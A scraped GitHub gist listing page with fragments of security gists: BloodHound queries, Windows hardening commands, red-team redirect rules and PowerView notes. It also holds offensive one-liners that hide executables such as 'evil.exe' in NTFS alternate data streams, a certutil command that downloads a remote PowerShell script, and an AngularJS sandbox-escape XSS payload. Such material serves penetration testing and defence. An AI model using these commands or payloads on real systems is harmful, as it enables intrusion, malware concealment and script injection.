MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
leechristensen
/ FindingComputersWithLocalAdmin.md
Created
August 30, 2019 22:51
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
liamosaur
/ foxyproxy.json
Created
June 3, 2019 05:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "mode": "patterns", | |
| "proxySettings": [ | |
| { | |
| "address": "127.0.0.1", | |
| "port": 8080, | |
| "username": "", | |
| "password": "", | |
| "type": 1, | |
| "title": "127.0.0.1:8080", |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
bayotop
/ last-evet-id.md
Last active
June 28, 2022 15:10
Sending arbitrary Last-Event-ID header values across origins using the EventSource API.
The EventSource API
The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.
https://developer.mozilla.org/en-US/docs/Web/API/EventSource
Last-Event-ID
Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.
jaredhaight
/ windows_hardening.cmd
Last active
April 28, 2024 16:59
— forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: | |
| ::####################################################################### | |
| :: | |
| :: Change file associations to protect against common ransomware attacks | |
| :: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell | |
| :: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) | |
| :: --------------------- | |
| ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
curi0usJack
/ .htaccess
Last active
March 13, 2024 10:17
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets |
snare
/ BadTalkTitles
Last active
March 29, 2022 11:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 😒🙅🙄 | |
| $thing for fun and profit | |
| all your $thing are belong to $shutup | |
| honey I $verbed the $thing | |
| $thing demystified | |
| $thing: a deep dive | |
| $verb all the things | |
| make $thing great again | |
| $x and $y and $z, oh my! |
jeremybuis
/ angular.sandbox.escapes.md
Created
January 27, 2016 15:31
Angular Sandbox Escape Cheatsheet
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
NewerOlder